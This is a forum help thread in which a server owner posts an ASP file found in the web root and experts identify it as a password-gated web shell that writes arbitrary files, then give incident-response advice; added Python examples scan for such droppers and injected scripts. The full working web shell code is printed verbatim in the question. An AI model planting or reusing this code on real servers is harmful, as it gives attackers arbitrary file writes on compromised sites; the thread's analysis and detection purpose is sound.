Solved

iis hack - can someone help decipher this text file left on my server ?

Posted on 2013-01-15
7
432 Views
Last Modified: 2013-01-16
I recently noticed a text file on my server. I'm having trouble deciphering it, and deciding my next steps.  I see no other files changed or added at that time.  Advice appreciated.

The .txt file is attached and code is below:

<%
on error resume next
%>
<%
if request("pass")="hack" then
session("pw")="go"
end if
%>
<%if session("pw")<>"go" then %>
<%="<center><br><form action='' method='post'>"%>
<%="<input name='pass' type='password' size='10'> <input "%>
<%="type='submit' value='Go!'></center>"%>
<%else%>
<%
set fso=server.createobject("scripting.filesystemobject")
path=request("path")
if path<>"" then
data=request("da")
set da=fso.createtextfile(path,true)
da.write data
if err=0 then
%>
<%="success"%>
<%else%>
<%="no"%>
<%
end if
err.clear
end if
da.close
%>
<%set da=nothing%>
<%set fos=nothing%>
<%="<form action='' method=post>"%>
<%="<input type=text name=path>"%>
<%="<br>"%>
<%="wenjianlujing:"&server.mappath(request.servervariables("script_name"))%>
<%="<br>"%>
<%="xitong:"&Request.ServerVariables("OS")%>
<%="<br>"%>
<%="WEBFWQ:"&Request.ServerVariables("SERVER_SOFTWARE")%>
<%="<br>"%>
<%="IP:"&Request.ServerVariables("LOCAL_ADDR")%>
<%="<br>"%>
<%=""%>
<%="<textarea name=da cols=50 rows=10 width=30></textarea>"%>
<%="<br>"%>
<%="<input type=submit value=save>"%>
<%="</form>"%>
<%end if%>
test.txt
Question by:drelinger
7 Comments
 
LVL 50

Expert Comment

by:Steve Bink
The file looks for a form submission with a field named "pass".  If the "pass" field equals the string "hack", a session variable is set to "go".

Then it looks at the session variable.  If it is not "go", the script renders an HTML form to the user, including the "pass" field.

If the session variable is go, the script displays a different form.  The form includes some server-side information (script name, OS, etc.), a textbox named "path", and a textarea field named "da".  If this form is submitted (assuming the password check passed earlier), the contents of the field "da" from this form submission are written to the file specified in the field "path".  If the file specified in "path" already exists, it is overwritten.

This script is used to place arbitrary files on your server.  Theoretically, it could even be used to write executable files.  The script's ability to access protected areas will be determined by the security token of the user running IIS (generally, an IUSR_* account).  If you found this file on your server, it is very possible that you have other vulnerabilities or exploits installed, and that your server is currently being used to target your site's visitors for unpleasantness.
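To hunt for other copies of this kind of dropper across a web root, here is an added example in Python (not code from the thread): it flags ASP source that creates a FileSystemObject and writes to a path taken straight from the request, the pattern the file above uses. The sample strings are constructed to mirror the posted shell, and the list of scanned extensions is an assumption.

```python
import re
from pathlib import Path

# Static indicators taken from the dropper above: FSO creation, a password gate on
# request("pass"), blanket error suppression and server fingerprinting.
INDICATORS = {
    "filesystemobject": r'createobject\s*\(\s*["\']scripting\.filesystemobject["\']',
    "password_gate": r'request\s*\(\s*["\']pass["\']\s*\)',
    "error_suppression": r'\bon\s+error\s+resume\s+next\b',
    "server_fingerprint": r'servervariables\s*\(\s*["\'](?:os|server_software|local_addr)["\']',
}
ASSIGN_FROM_REQUEST = re.compile(r'\b(\w+)\s*=\s*request\s*\(')
FILE_CREATE = re.compile(r'\.(?:createtextfile|opentextfile)\s*\(\s*(\w+)')

def scan_asp_source(text: str) -> list[str]:
    """Return the indicator names found in one ASP source string."""
    src = text.lower()
    hits = [name for name, pat in INDICATORS.items() if re.search(pat, src)]
    # Taint check: a variable filled from request(...) that is later used as a file path.
    tainted = set(ASSIGN_FROM_REQUEST.findall(src))
    if any(m.group(1) in tainted for m in FILE_CREATE.finditer(src)):
        hits.append("request_controlled_write")
    return hits

def scan_tree(root, suffixes=(".asp", ".asa", ".inc", ".txt")) -> dict[str, list[str]]:
    """Walk a web root (assumed extension list) and map each flagged file to its indicators."""
    findings = {}
    for p in Path(root).rglob("*"):
        if p.is_file() and p.suffix.lower() in suffixes:
            hits = scan_asp_source(p.read_text(errors="replace"))
            if "request_controlled_write" in hits or len(hits) >= 2:
                findings[str(p)] = hits
    return findings

# Constructed samples: a trimmed copy of the posted dropper and a benign page.
SHELL_SAMPLE = """<% on error resume next %>
<% if request("pass")="hack" then session("pw")="go" end if %>
<% set fso=server.createobject("scripting.filesystemobject")
path=request("path")
data=request("da")
set da=fso.createtextfile(path,true)
da.write data %>
<%="IP:"&Request.ServerVariables("LOCAL_ADDR")%>"""
BENIGN_SAMPLE = """<% Dim name
name = Request("name")
Response.Write("Hello " & Server.HTMLEncode(name)) %>"""

if __name__ == "__main__":
    print(scan_asp_source(SHELL_SAMPLE))   # all five indicators
    print(scan_asp_source(BENIGN_SAMPLE))  # []
```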
 
LVL 22

Expert Comment

by:rickhobbs
Where was this file located?
 
LVL 82

Expert Comment

by:Dave Baldwin
I agree with @routinet, it is a classic ASP file/program to write files on your server.
 

Author Comment

by:drelinger
The file was located in the website root directory. There are no other file changes at that specific time.
Can anyone suggest further steps I should take having found this file ?
 
LVL 50

Accepted Solution

by: Steve Bink (earned 500 total points)
That really depends on how paranoid you want to be.

In my world, the server would be wiped ASAP, with all services moved to a replacement until such time as it was ready to resume service.  It wouldn't be long, since the server would be restored in full from the latest backup...you do have backups, right?

At the very least, you should begin by doing a code audit for any sites on the server.  The fact that they have access to write arbitrary files means they could theoretically write files and manipulate the meta data.  In other words, just because a file looks like it hasn't been modified, does not mean it is not modified.  One popular target is to inject obfuscated javascript just after the open body tag in HTML files.

And, of course, you need to audit the server itself.  Find out what services/DLLs/extensions are running on boot, and if they're supposed to be there.  It could have a back-door installed, or some other less-visible application designed to tamper with the network communications.

If you do nothing else, you'll need to find how that file got on the server, and close that door.  IME, most of these hacks are the result of brute-forced/dictionary'd FTP or publishing services.  Disable FrontPage/WebDAV extensions.  Force all FTP users to change their passwords, and enforce a level of password complexity.  Above all, audit the security of all user accounts associated with your web service in any way, including the system accounts.  Make sure they have the permissions they need, and nothing more.

The good news is that most incidents like this (again, IME) are drive-by attacks...fire and forget.  They find a vulnerable site (as opposed to targeting the server itself), drop some stealthy javascript redirects, and move on.  If you're on shared hosting, that is probably all it is.  If you host your own server, it is more likely to have been targeted instead of the site, but that pattern still fits.
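Two checks that follow from the audit advice above, as an added example in Python (not code from the thread): flag scripts injected right after the opening body tag, and compare content hashes against a known-good baseline so that file timestamps, which a writer of arbitrary files can tamper with, are not trusted. The sample pages and manifests are constructed, and the extension lists are assumptions.

```python
import hashlib
import re
from pathlib import Path

# A <script> sitting immediately after the opening <body> tag, the placement the answer
# above describes for injected redirects.
BODY_SCRIPT = re.compile(r'<body\b[^>]*>\s*<script\b[^>]*>(.*?)</script>', re.I | re.S)
# Traits common to obfuscated injected scripts (heuristics for review, not proof).
OBFUSCATION_HINTS = {
    "eval": r'\beval\s*\(',
    "unescape": r'\bunescape\s*\(',
    "fromCharCode": r'fromCharCode',
    "url_escaped_run": r'(?:%[0-9a-f]{2}){8,}',
    "hex_escaped_run": r'(?:\\x[0-9a-f]{2}){8,}',
}

def suspicious_body_scripts(html: str) -> list[dict]:
    """Return each script placed right after <body>, with the obfuscation hints it shows."""
    found = []
    for m in BODY_SCRIPT.finditer(html):
        body = m.group(1)
        hints = [n for n, pat in OBFUSCATION_HINTS.items() if re.search(pat, body, re.I)]
        found.append({"snippet": body[:60], "hints": hints})
    return found

def hash_tree(root, suffixes=(".htm", ".html", ".asp", ".js")) -> dict[str, str]:
    """SHA-256 of every content file under root (assumed suffix list); content hashes,
    unlike modification times, cannot be faked by whoever wrote the file."""
    root = Path(root)
    return {str(p.relative_to(root)): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in root.rglob("*") if p.is_file() and p.suffix.lower() in suffixes}

def compare_manifests(baseline: dict, current: dict) -> dict[str, list[str]]:
    """Diff a known-good manifest (e.g. taken from the last clean backup) against a fresh one."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "changed": sorted(k for k in baseline.keys() & current.keys() if baseline[k] != current[k]),
    }

# Constructed samples: a page with an injected script and a clean page.
INJECTED = '<html><body><script>eval(unescape("%3c%69%66%72%61%6d%65%20%73%72%63%3d"))</script><p>Hi</p></body></html>'
CLEAN = '<html><body><p>Hi</p><script src="/js/app.js"></script></body></html>'

if __name__ == "__main__":
    print(suspicious_body_scripts(INJECTED))  # one entry with eval/unescape/url_escaped_run hints
    print(suspicious_body_scripts(CLEAN))     # []
```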
 
LVL 22

Expert Comment

by:rickhobbs
Just to be sure, I would also run a reliable anti-spyware product like Malwarebytes.
 

Author Closing Comment

by:drelinger
Great advice, thank you very much.